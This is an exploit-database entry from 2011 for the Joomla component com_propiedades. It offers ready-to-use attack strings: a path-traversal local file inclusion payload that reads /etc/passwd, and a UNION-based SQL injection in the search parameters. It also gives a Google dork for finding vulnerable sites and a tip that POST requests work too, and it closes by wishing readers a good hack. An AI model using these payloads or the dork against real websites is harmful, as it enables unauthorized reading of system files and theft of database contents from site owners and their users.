Joomla com_com_propiedades Multiple Vulnerabilities



EKU-ID: 614 CVE: OSVDB-ID:
Author: z0mbyak Published: 2011-06-24 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Joomla com_com_propiedades Multiple Vulnerabilities
# Date: 23.06.2011
# Author: z0mbyak
# Vendor or Software Link: find by yourself
# Version: Don't know
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_
propiedades"
# Tested on: FreeBSD

LFI Vulnerability:

exploit: ../../../../../../../../../../../../etc/passwd%00
VulnSite: vulnsite.name/index.php?option=com_propiedades&controller=../../../../../../../../../../../../etc/passwd%00

SQL-Inj Vulnerability:

exploit: null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0
VulnSite:  vulnsite.name/index.php?option=com_propiedades&task=search&id_provincia=null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0

P.S. The search function is made on Ajax, so you can also use a POST
request to identify vulnerabilities.

P.S.S Have a GooD Hack, and Greets From RUSSIA.